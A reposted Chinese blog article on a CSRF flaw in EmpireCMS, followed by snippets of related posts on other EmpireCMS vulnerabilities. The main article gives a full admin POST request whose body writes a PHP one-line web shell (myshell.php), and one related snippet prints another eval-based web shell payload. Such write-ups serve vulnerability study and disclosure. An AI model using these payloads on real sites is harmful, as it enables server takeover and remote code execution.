帝国php漏洞,EmpireCMS(帝国cms)csrf getshell

最新推荐文章于 2024-11-19 16:31:31 发布
转载 最新推荐文章于 2024-11-19 16:31:31 发布 · 674 阅读 · 1
文章标签:

#帝国php漏洞

本文分析了帝国CMS中存在的一项CSRF漏洞,该漏洞允许攻击者利用默认设置进行恶意操作,包括通过投稿功能上传Web Shell。文章通过实例展示了如何利用此漏洞,并提供了详细的步骤。

漏洞作者: ../

帝国cms默认添加栏目时候默认是允许投稿。

另外帝国的会员中心基本都是开启的,有的就算不开启也是可以匿名投稿。

漏洞证明:

d7f01b0295b7ebcb888f30e2c3e59464.png

图1所示,帝国添加栏目时候默认是开启投稿的。

610ec63adfb53d228755977491b3c6be.png

图2所示,虽然过滤的

也就是http://127.0.0.1/1.js,1.js代码看这里 WooYun: 帝国CMS CSRF GetShell

041923060fea177d5a4dad9119f63599508b8213.jpg

图3所示:管理员看到未审核内容时候点击标题可以查看内容。

041926058a4deb8cae3a5c6ac887f1469811f13d.jpg

图4所示:管理员查看预览稿件时候调用外部1.js,post /e/admin/ecmscom.phpenews=AddUserpage&id=&oldpath=page.html&cid=&gid=1&pagemod=1&title=aaa&path=page.html&classid=0&pagetitle=&pagekeywords=&pagedescription=&pagetext=%3C%3Fphp+file_put_contents%28%27myshell.php%27%2C%27%3C%3Fphp+%24_GET%5Bc%5D%28%24_POST%5Bx%5D%29%3B%3F%3E%27%29%3B%3F%3E&Submit=%E6%8F%90%E4%BA%A4

在/e/admin/目录生成myshell.php一句话。

04192842935ae649d0d8d742b4c356105037457a.jpg

BillMarshall
关注
帝国cms漏洞CMS7.5漏洞复现
计算机毕业论文源码,学生个人网页制作html源码。贴近用户做网络推广和互联网优化。
12-05 2543
.帝国cms漏洞简介 EmpireCMS 7.5版本及之前版本在后台备份数据库时,未对数据库表名做验证,通过修改数据库表名可以实现任意代码执行。 [帝国cms漏洞影响版本]
帝国CMS漏洞get webshell权限漏洞详情与修复
计算机毕业论文源码,学生个人网页制作html源码。贴近用户做网络推广和互联网优化。
12-05 1245
帝国CMS漏洞get webshell权限漏洞详情与修复。最近我们SINE安全在对帝国CMS系统进行代码安全审计的时候,发现该系统存在网站漏洞,受影响的版本是EmpireCMS V7.5,从帝国官方网站下载到本地,我们人工对其代码进行详细的漏洞检测与安全代码分析。共计发现三个高危漏洞,都是在网站的后台管理页面上的功能发现的。该漏洞的产生,最根源的问题是没有对get,post提交方式进行严格的安全效验与过滤,导致可以插入恶意代码到后端服务器中去处理,导致漏洞的发生。
帝国cms7.5漏洞复现
热门推荐
cxk
05-10 2万+
EmpireCMS v7.5后台任意代码执行分析 目录 一.漏洞简介 二.漏洞复现 三.原理分析 一.漏洞简介 EmpireCMS 7.5版本及之前版本在后台备份数据库时,未对数据库表名做验证,通过修改数据库表名可以实现任意代码执行。 [影响版本] <=7.5 [漏洞危害] 高 [漏洞位置] /e/admin/admin/ebak/phome.php.漏洞复现 1 访问靶机192.168...
帝国Cms7.5后台getshell | (CVE-2018-18086)漏洞复现
一醉一休的博客
09-13 3957
EmpireCMS帝国网站管理系统)是一套内容管理系统(`CMS`),EmpireCMS 7.5版本及之前版本在后台备份数据库时,未对数据库表名做验证,通过修改数据库表名可以`实现任意代码执行`,EmpireCMS7.5版本中的/e/class/moddofun.php文件的`LoadInMod函数`存在安全漏洞,攻击者可利用该漏洞上传任意文件,该漏洞编号为`CVE-2018-18086`
帝国CMSEmpireCMS漏洞复现
RMC131的博客
06-30 4051
帝国网站管理系统》英文译为Empire CMS,简称Ecms,它是基于B/S结构,且功能强大而帝国CMS-logo易用的网站管理系统。帝国CMS官网:http://www.phome.net/参考相关漏洞分析文章,加上更详细的渗透测试过程。
帝国cms v7.5---漏洞分析
2201_76017178的博客
05-25 9910
帝国CMS漏洞分析,解析EmpireCMSv7.5存在的漏洞以及漏洞的复现
帝国CMS(EmpireCMS) v7.5 前台XSS漏洞复现
小赵同学的博客
02-23 2871
. 漏洞描述 该漏洞是由于JavaScript获取url的参数,没有经过任何过滤直接当作a标签和img标签的href属性和src属性输出 二. 漏洞复现 需要开启会员空间功能,登录后台开启会员空间功能(系统设置>用户设置>开启会员空间) 漏洞出现的我位置是/e/Viewimg/index.html 浏览代码,发现代码存在漏洞 分析代码:通过Request函数获取地址栏的url,并作为img和a标签的src属性和href属性然后经过document.with输出到页面 跟进R
帝国cms漏洞分析前台XSS漏洞
计算机毕业论文源码,学生个人网页制作html源码。贴近用户做网络推广和互联网优化。
12-05 2206
帝国cms漏洞分析前台XSS漏洞 一、帝国cms漏洞描述 该漏洞是由于javascript获取url的参数,没有经过任何过滤,直接当作a标签和img标签的href属性和src属性输出。 二、帝国cms漏洞复现 1、需要开启会员空间功能(默认关闭),登录后台开启会员空间功能。
帝国CMS(EmpireCMS) v7.5配置文件写入漏洞分析
WY92139010的博客
08-19 962
帝国CMS(EmpireCMS) v7.5配置文件写入漏洞分析 一、漏洞描述 该漏洞是由于安装程序时没有对用户的输入做严格过滤,导致用户输入的可控参数被写入配置文件,造成任意代码执行漏洞。 二、漏洞复现 1、漏洞出现位置如下图,phome_表前缀没有被严格过滤导致攻击者构造恶意的代码    2、定位漏洞出现的位置,发现在/e/install/index.php,下图可以看到表...
帝国EmpireCMS_7.5_SC_UTF8漏洞复现
wutiangui的博客
09-13 925
然后执行:http://127.0.0.1/EmpireCMS_7.5_SC_UTF8/upload/e/install/index.phpEmpireCMS 7.5版本及之前版本在后台备份数据库时,未对数据库表名做验证,通过修改数据库表名。访问备份文件目录下的config.php,将readme.txt改为config.php。进入后台,依次访问 -> [系统]-[系统设置]-[备份与恢复数据]-[备份数据]下载地址:http://www.phome.net/download/输入数据库用户名密码。
帝国CMS存在SQL注入漏洞(CNVD-2024-4321448、CVE-2023-50073)
最新发布
护卫神的博客
11-19 937
帝国CMSEmpireCMS)是一款非常出名的网站管理系统,用户也非常多。国家信息安全漏洞共享平台于2024-11-06公布其存在SQL注入漏洞
empirecms 文件上传漏洞 (CVE-2018-18086)
xy_wjyjw的博客
10-30 422
在桌面新建php文件,把后缀名修改为mod,写入这句话。在虚拟终端输入dir /tmp 查看flag。系统——数据表与系统模型——导入系统模型。上传之后点击马上导入,并导入成功。访问网页,发现空白,说明添加成功。empirecms 文件上传。用蚁剑连接,添加成功。
帝国cms empirecms 文件上传 (CVE-2018-18086)复现
YouthBelief的博客
11-18 4398
所有文章,仅供安全研究与学习之用,后果自负! 这里写目录标题empirecms 文件上传 (CVE-2018-18086)0x01 漏洞描述0x02 影响范围0x03 漏洞复现0x04 漏洞修复 empirecms 文件上传 (CVE-2018-18086) 0x01 漏洞描述 EmpireCMS帝国网站管理系统)是一套内容管理系统(CMS)。 EmpireCMS 7.5版本中的e/class/moddofun.php文件的‘LoadInMod’函数存在安全漏洞。攻击者可利用该漏洞上传任意文件。 密码:a
帝国CMS后台getshell
qq_50854662的博客
04-02 929
后台新增页面,写入webshell <?php fputs(fopen("shell.php","a"),'<?php phpinfo();@eval($_POST[cmd]);?>')?> 在后台查看文件写入成功 访问成功 shell工具连接成功 ...
EmpireCMS文件写入getshell
Zlirving_的博客
06-27 1162
漏洞描述 Empirecms V6.5后台自定义页面处通过任意文件写入可getshell ①任意文件写入漏洞的原理通过提交数据,可以将任意的文件写入到网站中。 ②攻击者在获取到后台权限后,进行添加页面,添加成php页面,并且内容为一个PHP一句话木马,即可获得shell权限,威胁网站安全。   漏洞分析 //后台自定义斜页面写入文件的方法 WriteFiletext($path,$pagetext); ... function WriteFiletext($filepath,$string) {
疑是帝国CMS(EmpireCMS v 6.0)最新BUG
chfgcf1的专栏
03-12 790
我是个茉鸟,在寻求建站系统时,找到了传说中灵活度最高,最好用的网站管理系统,也就是我要说的帝国cms,于是下载了个EmpireCMS v 6.0来研究一下,在学习帝国CMS的过程中,侧重了解了一下帝国的工作原理,大量的函数,耗了我几天时间才理清楚个来龙去脉。不经意间,发现一个疑是帝国CMS的bug,这个BUG不大不小,对平时的使用基本没什么影响,也就是在删除数据表的时候可能遇到。下面我就放出来吧,
我是如何通过CSRF拿到Shell
weixin_30516243的博客
09-22 254
织梦内容管理系统(DedeCms) 以简单、实用、开源而闻名,是国内最知名的PHP开源网站管理系统,也是使用用户最多的PHPCMS系统,在经历多年的发展,目前的版本无论在功能,还是在易用性方面,都有了长足的发展和进步,DedeCms免费版的主要目标用户锁定在个人站长,功能更专注于个人网站或中小型门户的构建,当然也不乏有企业用户和学校等在使用本系统。 最近我在搭建这个系统的时候偶然间发现了一个有...
帝国CMS6.0数据字典深入解析
根据提供的信息,标题“帝国cms6.0 数据字典”、描述“EmpireCMS 数据字典 帝国cms”以及标签“EmpireCMS 数据字典 帝国cms”指向了一个与帝国CMS(Empire Content Management System)相关的数据字典文件。...
评论
成就一亿技术人!
拼手气红包6.0元
还能输入1000个字符  | 博主筛选后可见
 
红包 添加红包
表情包 插入表情
表情包 代码片
 条评论被折叠 查看
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值